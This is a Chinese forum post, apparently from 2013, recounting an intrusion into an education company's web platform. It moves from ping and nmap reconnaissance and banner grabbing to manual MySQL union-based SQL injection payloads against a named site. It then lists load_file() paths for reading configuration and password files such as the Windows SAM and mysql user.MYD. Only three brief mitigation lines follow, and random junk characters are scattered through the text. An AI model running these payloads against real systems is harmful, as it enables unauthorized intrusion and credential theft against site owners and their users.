题记:
w# P+ u$ h+ P一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……3 S" g2 r( K/ W9 o9 R' j0 F
第一步:获取需要的信息
: r/ M7 ?. D+ x, |" d& K' G) a由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
, L9 ^3 ^) X5 O: W注:以下为保护特用XXX代替敏感信息9 F; b" u8 n0 v$ M
顺手先PING了一下他们的域名:8 o$ o/ | u Y m
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
4 V" w. n+ }6 S5 G64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms; Y1 X1 b1 u; x" e+ _- Y
顺便了解一下TTL,学好基础知识才能一路顺风:1 O& F3 Y4 `' s) f/ X! r! E
TTL:(Time To Live ) 生存时间/ V4 y S$ Y% W4 j- k
指定数据包被路由器丢弃之前允许通过的网段数量。2 j. o# ~2 v3 }" u" k$ ^
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。' ]- O4 `2 r* m8 C# f, M
使用PING时涉及到的 ICMP 报文类型/ U* {) ?& A! R0 H
一个为ICMP请求回显(ICMP Echo Request)9 j7 u2 U% O1 E6 ~/ V
一个为ICMP回显应答(ICMP Echo Reply)
- T1 o; H N+ X3 t* Z9 TTTL 字段值可以帮助我们识别操作系统类型。
$ W+ m- g1 h4 g5 {UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
! m# T9 t+ \( ICompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
: z* j8 P3 {+ x6 E( f0 n7 Y" m微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128, ?: G* q7 w5 C( b" n
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32 k+ u; ~$ J: _6 X
当然,返回的TTL值是相同的
, ^7 C5 w( H/ @/ P( ^/ }/ O9 x* E但有些情况下有所特殊
* [' N" i4 `9 U8 I1 G7 e; _: TLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
+ _9 u: G/ i% i9 j7 } ?FreeBSD 4.1, 4.0, 3.4;
v( y; ]5 y* |6 M# m9 I0 X' d7 vSun Solaris 2.5.1, 2.6, 2.7, 2.8;+ s- d4 [) {; ?. y: l, R
OpenBSD 2.6, 2.7,
, z4 a1 k+ x2 ]+ ?9 _% QNetBSD& a! D/ y& \' c- ]& e
HP UX 10.20
' k7 z9 A1 |+ v" Z" I" t* aICMP 回显应答的 TTL 字段值为 2557 z; c5 ~0 ~' T( e
Windows 95/98/98SE
% r* h7 v# b. A5 \* z5 fWindows ME7 y3 K9 f; o: t3 t9 N0 E8 N
ICMP 回显应答的 TTL 字段值为 322 U! H& e4 n6 _, p* [
Windows NT4 WRKS: Y7 z' M! L8 b9 @& S+ _2 S
Windows NT4 Server
8 }+ U. }. b7 L l; Z# _Windows 2000
" Q5 G- `6 k/ _) I& d: sWindows XP- i1 j8 r" }* K+ h% G1 T
ICMP 回显应答的 TTL 字段值为 128
" l( s o1 _* e* c& m这样,我们就可以通过这种方法来辨别操作系统* o& S/ n& l8 q& ]
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255! |. Y( r$ |0 c) T4 X
用NMAP扫描一下:
2 K# Y D0 ?9 ]0 j5 ]; unmap -sT -O XXX.XXX.XXX.XXX
( u/ S7 N, }& V3 z3 n如果没有装WinPcap则会弹出提示:: l" ~( D. s. b) s2 {! [8 Y
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
. ], w" q* D1 {0 e- dade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
8 x I- M$ E0 V0 w) mode — Nmap may not function completely
$ `, j8 b% V! y& a; h& F3 m1 x3 iTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
/ A7 ^3 T. K2 }and iphlpapi.dll be installed. You seem to be missing one or both of these. Win: z# c5 A6 ~. m8 U- ]0 I1 J
pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an* t% Y2 Y/ I% ?" b; j
d later operating sytems and NT 4.0 with SP4 or greater. For previous windows v7 l! o7 s6 V0 y( W% D; s3 D, K
ersions, you may be able to take iphlpapi.dll from another system and place it i5 Z, p7 X2 ?$ r9 d1 a y
n your system32 dir (e.g. c:\windows\system32).
5 P. a& L# I8 Y' X8 U5 Q m1 xQUITTING!) m& Y! c. b! \; C' @5 \
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
* X+ X5 D& m; r; D; ^1 W7 V安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:5 F% O; }+ r7 ^# }, D
Interesting ports on XXX.XXX.XXX.XXX:4 c7 V4 s: W/ v! P9 e& C. ?$ q; E, b
Not shown: 986 closed ports
+ q/ i5 F) }+ {& B6 r4 }PORT STATE SERVICE# d' I$ C3 G; ]* e# ~
21/tcp open ftp) Q, \1 B8 q+ {' F1 X, y
22/tcp open ssh; ~( S: [7 Q, L! ]
23/tcp open telnet
* m" X9 k/ V9 m" V8 { X80/tcp open http
3 Y7 |, H; `; a0 w111/tcp open rpcbind m9 ?8 n. F, c1 q3 C
135/tcp filtered msrpc2 g2 y) p" U$ d% I/ T
139/tcp filtered netbios-ssn; f J& z3 x- I7 P9 V2 Z: P9 i
445/tcp filtered microsoft-ds
& \7 t0 A9 [3 }+ R. L7 d513/tcp open login7 W: Y* Z& @- b9 N
514/tcp open shell
$ z$ n2 U A6 ~) q: J8 ^1 U593/tcp filtered http-rpc-epmap' L- H7 u i, ?, t5 W
1720/tcp filtered H.323/Q.9319 B# o, X5 R, i* E8 H/ q
3306/tcp open mysql* v3 O+ e* c, \, X, ^4 {$ Z
4444/tcp filtered krb524
3 v: p4 q( K2 y8 d5 x7 R' fDevice type: WAP
0 a! i$ r; @, h, MRunning: Linux 2.4.X
, [9 }, G4 F! B, Y7 YOS details: DD-WRT (Linux 2.4.35s)
. N5 M- x+ F+ X R- \' v6 d- zNetwork Distance: 13 hops
" w1 I2 p- s& p) h看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
# E, r9 U' H9 S& q- ulogin as:
# }) L; I, h( E5 C" i# rTelnet23端口也是开着的,用telnet 命令链接一下:
' G* O; Z( y' F, I% }8 N0 mtelnet XXX.XXX.XXX.XXX9 h" m0 A( x D% r
提示:! m% q3 O I2 s. n. S, X. Z& q
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
8 S) r2 k9 i5 A# RKernel 2.6.18-92.el5PAE on an i686
( D1 i1 E4 Z6 d5 Y/ O& i9 ?login:$ A. c- U, {& L
获取HTTP头信息:! y: c! ~: o/ Y( E3 ^' ^! o
在本地执行如下PHP代码
7 w$ x3 q5 Y# u8 W2 E$ O! g3 b<?php+ J! o' t: @. L D
$url = ‘XXX.XXX.XXX.XXX’;7 _& Q; h& `) a4 F4 R
print_r(get_headers($url)); }) {1 s W; [9 ~
print_r(get_headers($url, 1));
+ l8 W5 y2 X/ w+ o+ p$ U?>% I! U" S+ n, B/ M9 B
将以上代码保存为PHP文件,执行:3 W- X" N0 [2 |& M2 J/ [3 ^/ L
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )- l1 D5 @1 H/ B; G
现在可以得出结论:
- P( K: J+ ^) W" ^" U系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)/ h& l/ }, V; Y3 l
内核版本:Kernel 2.6.18-92.el5PAE on an i686
4 |% a& ^ [' ]3 m7 \4 t& RWEB服务器版本:nginx/0.7.61' f Q; Y3 u7 i) W: T- i
第二步,开始测试寻找漏洞* C! A a- U' e4 c! a
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
3 {$ e) r3 Y7 d% r1 w3 A1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
5 A7 ], v" F: D, V; s$ j2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
: Y+ N W( t' ?5 b8 ?7 Q4 S- ~$ Mhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常: ^+ K& h$ g% |! e( ~
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
$ R5 s. ~/ S! R0 I恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续9 \$ i1 o$ P, o9 D
3、手工注入:
# ^* I- X3 V2 U; ?& M注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
5 L( f7 ^, u t% v" z3.1 猜测当前表字段数. s* L2 ?6 d, E) _0 e% L; b
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10 y' d/ Z0 j3 D$ F) ]& z, `
此处猜测有个简单的算法,都是有技巧的吗,呵呵; J( u2 u% P! d+ Y0 ?7 g
算法简单如下:1 k# \- U- J) v! Y3 `
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了; f( Q3 K* U/ Q" C; x6 g7 h
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;- d: e# p4 H, f# }$ E
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
|/ \& G+ R8 ?* d% X, Q4 o4 ] k以此来判断,是否过界,配合取中算法猜出字段数。
, L8 a5 t7 Q9 Q i% H$ |举例:% v3 ~ |: z K* U# V0 h$ H
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
- v6 U& M4 w$ y- ]* M' R0 chttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
$ A ]2 ]' h5 t- b此时3则为我们要找的字段数。6 ~$ M: f" T9 Z- j( N# C% ^. _
3.2 配合union联合查询字段在页面所位置
! L. j+ A0 s& P4 g我们已经知道了字段数为3,此时则可以做如下操作:8 v& @ {+ ^$ D. U- V
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3 {: Z( G( l7 U
L: c# g* H% W% M
这样就可以测试到哪些字段在页面上有所显示了,如图:
2 Q4 [ x* e& s; D! o8 w; o9 l+ z% V; s/ Q: X) C$ T2 B4 i
3.3 查敏感信息: |9 _* b( u1 s" N( m5 m( v
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。# i. m, B0 m6 K! R1 |5 q7 x" t
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
" U! p* n) o& h! R3.3.1 先查数据库用户、数据库名,以备后用,如图:
! x6 e" n( R/ U" z0 F) k1 l1 J8 F- f
得到数据库用户为root、数据库名为DBxx;
+ z# z; J S8 m7 Q3 C; ]: ?3.3.2 查配置文件
: f0 K3 |7 I$ g6 d查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
7 n" K; E2 c5 `# R查看文件有一定的条件限制:
$ u0 ?; H ^0 j6 p- v, B欲读取文件必须在服务器上
. `4 C8 i X# e* [- q必须指定文件完整的路径0 c6 m/ C" ~ _% j
必须有权限读取并且文件必须完全可读; s N# d6 T0 k+ S7 U5 c6 r
欲读取文件必须小于 max_allowed_packet, u1 s" @" ^1 R
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
2 e' L- |2 }, o- Z常用的一些:4 Q/ C6 @! H" |- h r: @9 S3 F, J
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
6 @7 _6 G) u6 P5 f: p2 T/usr/local/apache2/conf/httpd.conf) E' X! s$ Y3 g } f! J
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置; j0 l% [! g) P k {
/usr/local/app/php5/lib/php.ini //PHP相关设置( o0 U# x7 Z. C& Q* a3 L) B) a h) w
/etc/sysconfig/iptables //从中得到防火墙规则策略
+ A5 F- G9 P2 v3 E- Y/etc/httpd/conf/httpd.conf // apache配置文件
% B2 y: K+ I; z; ?/etc/rsyncd.conf //同步程序配置文件7 ~: `/ n* P- ?; _
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
8 [! V! R9 m% `% a j# A: H9 f% ~/etc/my.cnf //mysql的配置文件" c5 t% U5 [' r5 k# l- x q# [
/etc/redhat-release //系统版本
* ~; e3 i1 Y0 m6 A6 J/ \% \/etc/issue
* D g, e* w5 @* }5 `/etc/issue.net* k% o2 {: j" y g
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码% k z# S- v0 C, L% J5 x" Y6 {
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
4 `4 b) s, y: Zc:\Program Files\Serv-U\ServUDaemon.ini
8 o4 M- x: ?4 t1 P+ J& Tc:\windows\my.ini //MYSQL配置文件
6 J K, K5 N+ \c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
X: T' Z, i7 j8 s8 }5 }等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
7 i1 B5 F3 h( sc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
) L- f3 c! p9 w1 zc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此( I) z0 m- M% y W
c:\Program Files\RhinoSoft.com\ServUDaemon.exe6 \$ _* I+ V! r& z6 F
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
" ~0 R, ~9 O8 g* v. m$ S2 \! T//存储了pcAnywhere的登陆密码
/ r, ^5 H$ N. l y0 f' |由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。: v3 w. W# R. X5 C8 N+ `
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。4 \/ T& v) E6 O# s; B6 o3 ^. Z
最后:防范措施
! O( I. r# K& J! m) T' a1、修复PHP注入漏洞;2 H( U; a6 @5 c9 T$ B
2、Mysql使用普通权限的用户;
6 Z/ d8 B* o9 O3、升级linux内核至最新版本; |
发表于 2013-2-16 22:23:32
收藏
支持
反对